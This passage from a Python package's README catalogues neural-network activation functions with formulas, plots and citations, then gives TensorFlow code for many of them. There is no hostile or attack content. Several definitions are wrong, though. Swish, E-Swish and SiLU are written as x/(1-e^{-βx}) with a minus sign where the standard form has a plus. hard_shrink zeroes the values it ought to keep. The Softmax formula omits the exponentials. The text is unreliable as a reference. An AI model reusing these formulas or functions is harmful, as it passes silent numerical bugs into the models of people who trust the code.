<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;1-e^{-e^x}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Complementary%20Log-Log.png">
</p>
* [Source Paper : Gomes, Gecynalda S. da S., and Teresa B. Ludermir. "Complementary log-log and probit: activation functions implemented in artificial neural networks." In 2008 Eighth International Conference on Hybrid Intelligent Systems, pp. 939-942. IEEE, 2008.](https://www.computer.org/csdl/proceedings-article/his/2008/3326a939/12OmNxHrykP)
19. Bipolar:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}-1&space;&&space;x&space;\leq&space;0\\1&space;&&space;x&space;>&space;0\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Bipolar.png">
</p>
20. Bipolar Sigmoid:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{1-e^{-x}}{1+e^{-x}}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/BipolarSigmoid.png">
</p>
* [Source Paper : Mansor, Mohd Asyraf, and Saratha Sathasivam. "Activation function comparison in neural-symbolic integration." In AIP Conference Proceedings, vol. 1750, no. 1, p. 020013. AIP Publishing LLC, 2016.](https://aip.scitation.org/doi/10.1063/1.4954526)
21. Tanh:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{e^{x}-e^{-x}}{e^{x}+e^{-x}}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/tanh.png">
</p>
* [Source Paper : Harrington, Peter de B. "Sigmoid transfer functions in backpropagation neural networks." Analytical Chemistry 65, no. 15 (1993): 2167-2168.](https://pubs.acs.org/doi/pdf/10.1021/ac00063a042)
22. Tanh Shrink:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x-tanh(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/tanhShrink.png">
</p>
23. LeCunTanh:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;1.7159\&space;tanh(\frac{2}{3}x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/LeCunTanh.png">
</p>
* [Source Paper : LeCun, Yann A., Léon Bottou, Genevieve B. Orr, and Klaus-Robert Müller. "Efficient backprop." In Neural networks: Tricks of the trade, pp. 9-48. Springer, Berlin, Heidelberg, 2012.](http://yann.lecun.com/exdb/publis/pdf/lecun-98b.pdf)
24. Hard Tanh:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}-1&space;&&space;x&space;<&space;-1\\x&space;&&space;-1&space;\leq&space;x&space;\leq&space;1\\1&space;&&space;x&space;>&space;1&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/HardTanh.png">
</p>
25. TanhExp:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;tanh(e^x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/TanhExp.png">
</p>
* [Source Paper : Liu, Xinyu, and Xiaoguang Di. "TanhExp: A smooth activation function with high convergence speed for lightweight neural networks." IET Computer Vision 15, no. 2 (2021): 136-150.](https://arxiv.org/abs/2003.09855)
26. ABS:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;|x|">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Abs.png">
</p>
27. SquaredReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x^2&space;&&space;x&space;\geq&space;0\\0&space;&&space;x&space;<&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/SquaredReLU.png">
</p>
* [Source Paper : So, David, Wojciech Mańke, Hanxiao Liu, Zihang Dai, Noam Shazeer, and Quoc V. Le. "Searching for Efficient Transformers for Language Modeling." Advances in Neural Information Processing Systems 34 (2021): 6010-6022.](https://arxiv.org/abs/2109.08668)
28. ParametricReLU (PReLU):
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;\geq&space;0\\&space;\alpha&space;x&space;&&space;x&space;<&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/PReLU.png">
</p>
* [Source Paper : He, Kaiming, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. "Delving deep into rectifiers: Surpassing human-level performance on imagenet classification." In Proceedings of the IEEE international conference on computer vision, pp. 1026-1034. 2015.](https://arxiv.org/abs/1502.01852)
29. RandomizedReLU (RReLU):
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;\geq&space;0\\&space;\alpha&space;x&space;&&space;x&space;<&space;0&space;\end{cases}">
<img src="https://latex.codecogs.com/svg.image?a&space;\sim&space;U(l,u)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/RReLU.png">
</p>
* [Source Paper : Xu, Bing, Naiyan Wang, Tianqi Chen, and Mu Li. "Empirical evaluation of rectified activations in convolutional network." arXiv preprint arXiv:1505.00853 (2015).](https://arxiv.org/abs/1505.00853?context=cs)
30. LeakyReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;\geq&space;0\\&space;0.01&space;x&space;&&space;x&space;<&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/LeakyReLU.png">
</p>
31. ReLU6:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;min(6,&space;max(0,x))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ReLU6.png">
</p>
* [Source Paper : Howard, Andrew G., Menglong Zhu, Bo Chen, Dmitry Kalenichenko, Weijun Wang, Tobias Weyand, Marco Andreetto, and Hartwig Adam. "Mobilenets: Efficient convolutional neural networks for mobile vision applications." arXiv preprint arXiv:1704.04861 (2017).](https://arxiv.org/abs/1704.04861)
32. ModReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}(|x|+b)\frac{x}{|x|}&space;&&space;|x|+b&space;\geq&space;0&space;\\0&space;&&space;|x|+b&space;\leq&space;0\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ModReLU.png">
</p>
* [Source Paper : Arjovsky, Martin, Amar Shah, and Yoshua Bengio. "Unitary evolution recurrent neural networks." In International conference on machine learning, pp. 1120-1128. PMLR, 2016.](https://arxiv.org/abs/1511.06464?context=stat)
33. CosReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;max(0,x)&space;+&space;cos(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/CosRelu.png">
</p>
34. SinReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;max(0,x)&space;+&space;sin(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/SinReLU.png">
</p>
35. Probit:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\sqrt{2}\&space;\&space;erfinv(2x&space;-&space;1)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Probit.png">
</p>
36. Cosine:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;Cos(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Cosine.png">
</p>
37. Gaussian:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;e^{-\frac{1}{2}x^2}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Gaussian.png">
</p>
38. Multiquadratic:
Choose some point (x,y).
<img src="https://latex.codecogs.com/svg.image?\rho(z)&space;=&space;\sqrt{(z&space;-&space;x)^{2}&space;+&space;y^{2}}&space;">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Multiquadratic.png">
</p>
39. InvMultiquadratic:
<img src="https://latex.codecogs.com/svg.image?\rho(z)&space;=&space;\frac{1}{\sqrt{(z&space;-&space;x)^{2}&space;+&space;y^{2}}&space;}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/InvMultiquadratic.png">
</p>
40. SoftPlus:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;ln(1+e^x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/SoftPlus.png">
</p>
* [Source Paper : Dugas, Charles, Yoshua Bengio, François Bélisle, Claude Nadeau, and René Garcia. "Incorporating second-order functional knowledge for better option pricing." Advances in neural information processing systems 13 (2000).](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.966.2210&rep=rep1&type=pdf)
41. Mish:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;tanh(SoftPlus(x))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Mish.png">
</p>
* [Source Paper : Misra, Diganta. "Mish: A self regularized non-monotonic neural activation function." arXiv preprint arXiv:1908.08681 4, no. 2 (2019): 10-48550.](https://arxiv.org/abs/1908.08681)
42. Smish:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;tanh(log(1+Sigmoid(x)))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Smish.png">
</p>
43. ParametricSmish (PSmish):
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;a\&space;tanh(log(1+Sigmoid(b)))">
<img src="https://latex.codecogs.com/svg.image?a=&space;\alpha&space;x">
<img src="https://latex.codecogs.com/svg.image?b=&space;\beta&space;x">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/PSmish.png">
</p>
44. Swish:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{x}{1-e^{-\beta&space;x}}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Swish.png">
</p>
* [Source Paper : Ramachandran, Prajit, Barret Zoph, and Quoc V. Le. "Searching for activation functions." arXiv preprint arXiv:1710.05941 (2017).](https://arxiv.org/abs/1710.05941?context=cs.LG)
45. ESwish:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\beta\&space;\frac{x}{1-e^{-\beta&space;x}}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ESwish.png">
</p>
* [Source Paper : Alcaide, Eric. "E-swish: Adjusting activations to different network depths." arXiv preprint arXiv:1801.07145 (2018).](https://arxiv.org/pdf/1801.07145)
46. Hard Swish:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;\frac{ReLU6(x+3)}{6}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/HardSwish.png">
</p>
* [Source Paper : Howard, Andrew, Mark Sandler, Grace Chu, Liang-Chieh Chen, Bo Chen, Mingxing Tan, Weijun Wang et al. "Searching for mobilenetv3." In Proceedings of the IEEE/CVF international conference on computer vision, pp. 1314-1324. 2019.](https://ieeexplore.ieee.org/document/9008835)
47. GCU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;cos(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/GCU.png">
</p>
* [Source Paper : Noel, Mathew Mithra, Advait Trivedi, and Praneet Dutta. "Growing cosine unit: A novel oscillatory activation function that can speedup training and reduce parameters in convolutional neural networks." arXiv preprint arXiv:2108.12943 (2021).](https://deepai.org/publication/growing-cosine-unit-a-novel-oscillatory-activation-function-that-can-speedup-training-and-reduce-parameters-in-convolutional-neural-networks)
48. CoLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{x}{1-x&space;e^{-(x+e^x)}}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/CoLU.png">
</p>
* [Source Paper : Vagerwal, Advait. "Deeper Learning with CoLU Activation." arXiv preprint arXiv:2112.12078 (2021).](https://arxiv.org/abs/2112.12078)
49. PELU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}cx&space;&&space;x&space;>&space;0\\&space;\alpha&space;e^{\frac{x}{b}}-1&space;&&space;x&space;\leq&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/PELU.png">
</p>
* [Source Paper : Trottier, Ludovic, Philippe Giguere, and Brahim Chaib-Draa. "Parametric exponential linear unit for deep convolutional neural networks." In 2017 16th IEEE International Conference on Machine Learning and Applications (ICMLA), pp. 207-214. IEEE, 2017.](https://arxiv.org/abs/1605.09332?context=cs)
50. SELU:
<img src="https://latex.codecogs.com/svg.image?f\left(x\right)&space;=&space;\lambda{x}&space;\text{&space;if&space;}&space;x&space;\geq{0}$$&space;$$f\left(x\right)&space;=&space;\lambda{\alpha\left(\exp\left(x\right)&space;-1&space;\right)}&space;\text{&space;if&space;}&space;x&space;<&space;0">
where $\alpha \approx 1.6733$ & $\lambda \approx 1.0507$
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/SELU.png">
</p>
* [Source Paper : Klambauer, Günter, Thomas Unterthiner, Andreas Mayr, and Sepp Hochreiter. "Self-normalizing neural networks." Advances in neural information processing systems 30 (2017).](https://papers.nips.cc/paper/6698-self-normalizing-neural-networks)
51. CELU:
<img src="https://latex.codecogs.com/svg.image?CELU\left&space;(&space;x&space;\right&space;)=&space;max(0,&space;x)&space;+&space;min(0&space;,&space;\alpha&space;(e^{\frac{x}{\alpha&space;}}&space;-1))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/CELU.png">
</p>
* [Source Paper : Barron, Jonathan T. "Continuously differentiable exponential linear units." arXiv preprint arXiv:1704.07483 (2017).](https://arxiv.org/abs/1704.07483)
52. ArcTan:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;ArcTang(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ArcTan.png">
</p>
53. ShiftedSoftPlus:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;log(0.5+0.5e^x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ShiftedSoftPlus.png">
</p>
* [Source Paper : Schütt, Kristof, Pieter-Jan Kindermans, Huziel Enoc Sauceda Felix, Stefan Chmiela, Alexandre Tkatchenko, and Klaus-Robert Müller. "Schnet: A continuous-filter convolutional neural network for modeling quantum interactions." Advances in neural information processing systems 30 (2017).](https://dl.acm.org/doi/abs/10.5555/3294771.3294866)
54. Softmax:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{x_i}{\sum_j&space;x_j}">
* [Source Paper : Gold, Steven, and Anand Rangarajan. "Softmax to softassign: Neural network algorithms for combinatorial optimization." Journal of Artificial Neural Networks 2, no. 4 (1996): 381-399.](https://www.cise.ufl.edu/~anand/pdf/jannsub.pdf)
55. Logit:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{x}{1-x}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Logit.png">
</p>
56. GELU:
<img src="https://latex.codecogs.com/svg.image?f(X)&space;=&space;x&space;\&space;\phi&space;\(&space;x&space;)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/GELU.png">
</p>
57. Softsign:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{x}{|x|+1}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Softsign.png">
</p>
58. ELiSH:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}\frac{x}{1+e^{-x}}&space;&&space;x&space;\geq&space;0\\&space;\frac{e^x-1}{1+e^{-x}}&space;&&space;x&space;<&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ELiSH.png">
</p>
* [Source Paper : Basirat, Mina, and Peter M. Roth. "The quest for the golden activation function." arXiv preprint arXiv:1808.00783 (2018).](https://arxiv.org/abs/1808.00783)
59. Hard ELiSH:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x\&space;max(0,min(1,\frac{x+1}{2}))&space;&&space;x&space;\geq&space;0\\&space;(e^x-1)&space;max(0,min(1,\frac{x+1}{2}))&space;&&space;x&space;<&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/HardELiSH.png">
</p>
* [Source Paper : Basirat, Mina, and Peter M. Roth. "The quest for the golden activation function." arXiv preprint arXiv:1808.00783 (2018).](https://arxiv.org/abs/1808.00783)
60. Serf:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;erf(ln(1+e^x))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Serf.png">
</p>
* [Source Paper : Nag, Sayan, and Mayukh Bhattacharyya. "SERF: Towards better training of deep neural networks using log-Softplus ERror activation Function." arXiv preprint arXiv:2108.09598 (2021).](https://arxiv.org/abs/2108.09598?context=cs)
61. ELU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;>&space;0\\&space;\alpha&space;(exp(x)-1)&space;&&space;x&space;\leq&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ELU.png">
</p>
* [Source Paper : Clevert, Djork-Arné, Thomas Unterthiner, and Sepp Hochreiter. "Fast and accurate deep network learning by exponential linear units (elus)." arXiv preprint arXiv:1511.07289 (2015).](https://dblp.org/rec/journals/corr/ClevertUH15)
62. Phish:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;tanh(gelu(x))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Phish.png">
</p>
* [Source Paper : Naveen, Philip. "Phish: A novel hyper-optimizable activation function." (2022).](https://www.techrxiv.org/articles/preprint/Phish_A_Novel_Hyper-Optimizable_Activation_Function/17283824/2)
63. QReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;>&space;0\\&space;0.01\&space;x(x-2)&space;&&space;x&space;\leq&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/QReLU.png">
</p>
* [Source Paper : Parisi, Luca, Daniel Neagu, Renfei Ma, and Felician Campean. "QReLU and m-QReLU: Two novel quantum activation functions to aid medical diagnostics." arXiv preprint arXiv:2010.08031 (2020).](https://arxiv.org/abs/2010.08031)
64. m-QReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;>&space;0\\&space;0.01\&space;x&space;-x&space;&&space;x&space;\leq&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/m-QReLU.png">
</p>
* [Source Paper : Parisi, Luca, Daniel Neagu, Renfei Ma, and Felician Campean. "QReLU and m-QReLU: Two novel quantum activation functions to aid medical diagnostics." arXiv preprint arXiv:2010.08031 (2020).](https://arxiv.org/abs/2010.08031)
65. FReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x+b&space;&&space;x&space;>&space;0\\&space;b&space;&&space;x&space;\leq&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/FReLU.png">
</p>
* [Source Paper : Qiu, Suo, Xiangmin Xu, and Bolun Cai. "FReLU: flexible rectified linear units for improving convolutional neural networks." In 2018 24th international conference on pattern recognition (icpr), pp. 1223-1228. IEEE, 2018.](https://arxiv.org/abs/1706.08098)
## Cite this repository
```sh
@software{Pouya_ActTensor_2022,
author = {Pouya, Ardehkhani and Pegah, Ardehkhani},
license = {MIT},
month = {7},
title = {{ActTensor}},
url = {https://github.com/pouyaardehkhani/ActTensor},
version = {1.0.0},
year = {2022}
}
```
| ActTensor-tf | /ActTensor_tf-1.0.tar.gz/ActTensor_tf-1.0.0/README.md | README.md |
import tensorflow as tf
import numpy as np
from keras import backend
from keras.backend import *
from keras import backend as K
def hard_shrink(x, lamd):
"""
Hard Shrinkage (Hardshrink) Activation Function
Parameters
----------
x : tensor object
lamd : int, float
Returns
-------
tensor
"""
x = tf.where((-lamd<=x) & (x<=lamd), x, 0)
return x
def relu(x):
"""
Rectified Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x>0, x, 0)
return x
def identity(x):
"""
Linear Activation Function f(x)=x
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x
def step(x):
"""
Binary Step Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x>0,1,0)
return x
def sigmoid(x):
"""
Sigmoid Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return 1/(1 + tf.math.exp(-x))
def hard_sigmoid(x):
"""
Hard Sigmoid Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.maximum(0., tf.math.minimum(1., (x + 1.)/2.))
def log_sigmoid(x):
"""
LogSigmoid Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.log(sigmoid(x))
def silu(x):
"""
Sigmoid Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x / (1. - tf.math.exp(-x))
def parametric_linear(x, a):
"""
Linear Activation Function with parameter a
Parameters
----------
x : tensor object
a : int, float
alpha weight for x.
Returns
-------
tensor
"""
return a * x
def piecewise_linear(x, xmin, xmax):
"""
Piecewise Linear Activation Function
Choose some xmin and xmax, which is our "range". Everything less than than this range will be 0, and everything greater than this range will be 1. Anything else is linearly-interpolated between.
Parameters
----------
x : tensor object
xmin : int, float
min range.
xmax : int, float
max range.
Returns
-------
tensor
"""
m = 1./(xmax-xmin)
b = 1. - (m * xmax)
x = tf.where((x >= xmin) & (x <= xmax), tf.add(tf.multiply(x,m),b),x)
x = tf.where(x > 1., 1.,x)
x = tf.where(x < 0., 0.,x)
return x
def cll(x):
"""
Complementary Log-Log Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return 1. - (tf.math.exp(-(tf.math.exp(x))))
def bipolar(x):
"""
Bipolar Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x > 0., 1., -1.)
return x
def bipolar_sigmoid(x):
"""
Bipolar Sigmoid Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return (1. - tf.math.exp(-x))/(1. + tf.math.exp(-x))
def tanh(x):
"""
Hyperbolic Tangent Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return (2./(1. + tf.math.exp(-2.*x))) - 1.
def tanhshrink(x):
"""
TanhShrink Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x - tanh(x)
def leCun_tanh(x):
"""
LeCun's Tanh Activation Function
Used for efficient backprop.
Output Range : (-1.7159 to 1.7159)
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return (1.7159 * tf.math.tanh((2./3.) * x))
def hard_tanh(x):
"""
Hard Tanh Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.maximum(-1., tf.math.minimum(1., x))
def tanh_exp(x):
"""
Tanh Exponential Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x * tanh(tf.math.exp(x))
def Abs(x):
"""
Absolute Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.abs(x)
def squared_relu(x):
"""
Squared Rectified Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x > 0., tf.math.pow(x, 2.), 0.)
return x
def Parametric_ReLU(x, alpha):
"""
Parametric Rectified Linear Unit Activation Function
Parameters
----------
x : tensor object
alpha : int, float
Returns
-------
tensor
"""
x = tf.where(x>0., x, alpha*x)
return x
def Randomized_ReLU(x, lower, upper):
"""
Randomized Leaky Rectified Linear Unit Activation Function
Parameters
----------
x : tensor object
lower : int, float
lower range for random.uniform.
upper : int, float
upper range for random.uniform.
Returns
-------
tensor
"""
a = np.random.uniform(lower, upper, 1)
x = tf.where(x>=0., x, a*x)
return x
def leaky_ReLU(x):
"""
Leaky Rectified Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x>0., x, 0.01*x)
return x
def relu6(x):
"""
ReLU6 Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.minimum(tf.math.maximum(0., x), 6.)
def Mod_ReLU(x, bias):
"""
Mod Rectified Linear Unit Activation Function
Parameters
----------
x : tensor object
bias : int, float
Returns
-------
tensor
"""
x = tf.where(tf.abs(x)+bias>=0., (tf.abs(x)+bias)* (x/tf.abs(x)), 0.)
return x
def Cos_ReLU(x):
"""
Cosine ReLU Activation Function
a = σ(z) = max(0, z) + cos(z)
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.maximum(0.,x) + tf.math.cos(x)
def Sin_ReLU(x):
"""
Sin ReLU Activation Function
a = σ(z) = max(0, z) + sin(z)
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.maximum(0.,x) + tf.math.sin(x)
def probit(x):
"""
Probit Activation Function also known as Cumulative distribution function (CDF)
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.multiply(tf.math.sqrt(2.) , tf.math.erfinv( tf.math.subtract(tf.math.multiply(x, 2), 1)))
def Cosine(x):
"""
Cosine Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.cos(x)
def gaussian(x):
"""
Gaussian Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.exp(tf.math.multiply(-0.5, tf.math.pow(x, 2.)))
def Multi_quadratic(x, px, py):
"""
Multiquadratic Activation Function
Parameters
----------
x : tensor object
px: int, float
x dimension of chosen point
py: int, float
y dimension of chosen point
Returns
-------
tensor
notes
-----
px and py must be float otherwise it will get an error.
"""
return tf.math.sqrt(tf.math.add(tf.math.pow(tf.math.subtract(x,px ),2.), tf.math.pow(py, 2.)))
def Inv_Multi_quadratic(x, px, py):
"""
Inverse Multiquadratic Activation Function
Parameters
----------
x : tensor object
px: float
x dimension of chosen point
py: float
y dimension of chosen point
Returns
-------
tensor
notes
-----
px and py must be float otherwise it will get an error.
"""
return 1./(tf.math.sqrt(tf.math.add(tf.math.pow(tf.math.subtract(x,px ),2.), tf.math.pow(py, 2.))))
def softPlus(x):
"""
Softplus or Smooth ReLU Activation Function
Output Range : (0, infinity)
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.log(1. + tf.math.exp(x))
def mish(x):
"""
Mish Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x * tanh(softPlus(x))
def smish(x):
"""
Smish Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.multiply(x, tf.math.tanh(tf.math.log(tf.math.add(1., sigmoid(x)))))
def Parametric_Smish(x, alpha = 1., beta = 1.):
"""
Parametric Smish Activation Function
Parameters
----------
x : tensor object
alpha : float, default=1.
alpha weight.
beta : float, default=1.
beta weight.
Returns
-------
tensor
notes
-----
alpha and beta must be float otherwise it will get an error.
"""
a = tf.math.multiply(alpha, x)
b = tf.math.multiply(beta, x)
return tf.math.multiply(a, tf.math.tanh(tf.math.log(tf.math.add(1., sigmoid(b)))))
def swish(x, beta):
"""
Swish Activation Function
Parameters
----------
x : tensor object
beta : int, float
Returns
-------
tensor
"""
return x / (1. - tf.math.exp(-beta*x))
def eswish(x, beta):
"""
E-Swish Activation Function
Parameters
----------
x : tensor object
beta : int, float
Returns
-------
tensor
"""
return beta * (x / (1. - tf.math.exp(-beta*x)))
def hardSwish(x):
"""
Hard Swish Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x * (relu6(x+3) / 6)
def gcu(x):
"""
Growing Cosine Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.multiply(x, tf.math.cos(x))
def colu(x):
"""
Collapsing Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x / (1. - x*(tf.math.exp(-x-tf.math.exp(x))))
def softSHRINK(x, lambd):
"""
SOFTSHRINK Activation Function
Parameters
----------
x : tensor object
lambd : int, float
Returns
-------
tensor
"""
x = tf.where((x > (-lambd)) & (x < lambd),0.,x)
x = tf.where(x >= lambd, x - lambd, x)
x = tf.where(x <= (-lambd), x + lambd, x)
return x
def pelu(x, c, b, alpha):
"""
Parametric Exponential Linear Unit Activation Function
Parameters
----------
x : tensor object
alpha : int, float
c : int, float
b : int, float
Returns
-------
tensor
"""
x = tf.where(x>0., c*x, alpha*(tf.math.exp(x/b)-1.))
return x
